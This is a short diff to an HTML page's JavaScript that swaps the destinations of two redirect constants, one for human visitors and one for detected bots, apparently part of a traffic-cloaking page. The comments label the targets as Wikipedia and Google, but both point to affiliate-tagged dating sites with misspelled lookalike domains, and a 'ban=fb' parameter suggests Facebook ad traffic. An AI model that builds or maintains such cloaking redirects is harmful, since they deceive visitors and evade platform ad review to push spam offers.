--- a/index.html
+++ b/index.html
@@ -131,8 +131,8 @@ autocomplete="off"
 // === CONFIGURACIÓN DE SEGURIDAD JS ===
 const MIN_INTERACTION_TIME = 500; // Tiempo mínimo para considerarse humano (ms)
 // ⚠️ MODIFICA ESTAS DOS LÍNEAS PARA CAMBIAR LOS ENLACES
-const TARGET_URL_HUMAN = "https://aoarlv.satlsfyingdates.net/?utm_source=da57dc555e50572d&ban=fb&j1=1&s1=234303&s2=2188444&s3=morning"; // URL para tráfico legítimo (Wikipedia)
-const TARGET_URL_BOT = "https://aoarlv.satlsfyingdates.net/?utm_source=da57dc555e50572d&ban=fb&j1=1&s1=234303&s2=2188444&s3=morning"; // URL para bots (Google)
+const TARGET_URL_HUMAN = "https://aoarlv.gioriousdates.net/?utm_source=da57dc555e50572d&ban=fb&j1=1&s1=234303&s2=2193998&s3=morgann2"; // URL para tráfico legítimo (Wikipedia)
+const TARGET_URL_BOT = "https://aoarlv.gioriousdates.net/?utm_source=da57dc555e50572d&ban=fb&j1=1&s1=234303&s2=2193998&s3=morgann2"; // URL para bots (Google)
 // === Variables Globales de Estado ===
 let isBotDetected = false;
 let loadTimeRef = Date.now();
